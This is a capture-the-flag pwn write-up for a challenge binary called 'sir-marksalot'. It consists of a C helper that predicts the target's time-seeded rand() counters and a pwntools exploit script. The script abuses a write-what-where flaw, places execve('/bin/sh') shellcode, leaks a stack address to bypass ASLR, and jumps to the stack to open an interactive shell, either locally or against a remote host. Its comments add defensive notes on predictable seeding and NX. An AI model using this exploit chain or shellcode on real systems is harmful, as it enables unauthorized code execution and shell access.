Tags: write-what-where pwn pwnable
Rating: 1.0
timer.c
```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
/*
 * Print the two counters the exploit script reads from this helper.
 *
 * The C PRNG is seeded with the current wall-clock second, so every run
 * started in the same second prints the same pair; presumably this mirrors
 * the target's own seeding, which is why the script launches both
 * processes back to back.  Output: n1 and n2, each in 0..39, one per line.
 *
 * Defender note: a time-based srand() seed is guessable by anyone who knows
 * roughly when the program started.  Where unpredictability matters, draw
 * from the OS CSPRNG instead of rand().
 */
int main(void) {
  srand((unsigned)time(NULL));
  int counters[2];
  for (int i = 0; i < 2; i++) {
    counters[i] = rand() % 40;
  }
  printf("%d\n%d\n", counters[0], counters[1]);
  return 0;
}
```
```python
from pwn import *
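def pwn():
  """Drive the challenge process through the writeup's exploit steps.

  Uses two module-level globals set in ``__main__``: ``h``, the locally
  compiled ``timer.c`` that reproduces the target's time-seeded ``rand()``
  counters, and ``r``, the target process or remote connection.

  Assumptions worth knowing before re-running:
    * ``h`` and ``r`` must start within the same wall-clock second; the
      seed is ``time(0)``, so a second boundary between the two launches
      yields wrong ``n1``/``n2`` and the run fails — just retry.
    * The final step jumps to ``rsp`` and runs code placed there, so the
      technique appears to presuppose an executable stack.  NX together
      with a randomised, unleaked stack address would defeat the last two
      steps; the predictable seed is what makes the counters knowable.

  NOTE: in the pasted version ``r.sendline(b'jump up and down')`` and
  ``r.interactive()`` sat at column 0, which makes the module fail with an
  IndentationError (and a NameError on ``r``); both belong in this body.
  """
  # Counters from the helper; expected to equal the target's own draws.
  n1 = int(h.recvline().strip())
  n2 = int(h.recvline().strip())
  r.sendline(b'jump up and down')

  # Phase 1: n1 rounds of 'x', a 28-byte filler plus p32(8), then 'w'.
  # What the target does with that 32-byte buffer is not visible here.
  for _ in range(n1):
    r.recvuntil(b'):')
    r.sendline(b'x')
    r.sendafter(b'write?', b'A'*28 + p32(8))
    r.recvuntil(b'):')
    r.sendline(b'w')

  # Phase 2: n2+1 rounds placing the /bin/sh shellcode, padded with five
  # NOPs and a trailing 0x01 byte, via the 'a' option.  The payload is
  # constant, so it is built once outside the loop.
  payload = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
  payload += b"\x90" * 5
  payload += b"\x01"
  for _ in range(n2+1):
    r.recvuntil(b'):')
    r.sendline(b'x')
    r.sendlineafter(b'write?', payload)
    r.recvuntil(b'):')
    r.sendline(b'a')

  # Leak 1: the target echoes what it has "written:"; read the line as a
  # little-endian u64 (zero-padded to 8 bytes) and write it back unchanged
  # together with a high-half mask, 12 filler bytes and the 0x01 marker.
  r.recvuntil(b'written:')
  junk = u64(r.recvline().strip().ljust(8, b'\x00'))
  log.success(hex(junk))
  r.recvuntil(b'):')
  r.sendline(b'x')
  r.sendlineafter(b'write?', p64(junk) + p64(0xffffffff00000000) + b'C'*12 + b'\x01')
  r.recvuntil(b'):')
  r.sendline(b'a')

  # Leak 2: the last 6 bytes of the echoed line are treated as a stack
  # address (user-space pointers fit in 48 bits); this is the ASLR defeat.
  r.recvuntil(b'written:')
  junk = r.recvline().strip()
  stack = u64(junk[-6:].ljust(8, b'\x00'))
  log.success(hex(stack))

  # Final write: a small stub (add rsp,0x20 ; jmp rsp) padded with NOPs,
  # followed by the leaked stack address, then hand over the session.
  r.recvuntil(b'):')
  r.sendline(b'x')
  r.sendlineafter(b'write?', b"\x90\x48\x83\xC4\x20\xFF\xE4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + p64(stack))
  r.interactive()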
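if __name__ == '__main__':
  # Start the counter helper first so its time(0) seed lands in the same
  # second as the target's launch below; a mismatch shows up as wrong
  # n1/n2 and the only remedy is to re-run.
  h = process('./a.out')
  # ``sys`` and ``util`` come from pwntools' star import, not a local import.
  if len(sys.argv) > 1:
    # A remote target needs both host and port; the original check
    # (``> 1``) let a lone host argument raise IndexError on argv[2].
    if len(sys.argv) < 3:
      sys.exit(f'usage: {sys.argv[0]} [HOST PORT]')
    r = remote(sys.argv[1], int(sys.argv[2]))
  else:
    r = process(['./sir-marksalot'])
    # Printed so a debugger can be attached to the local target by pid.
    print(util.proc.pidof(r))
  pwn()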
```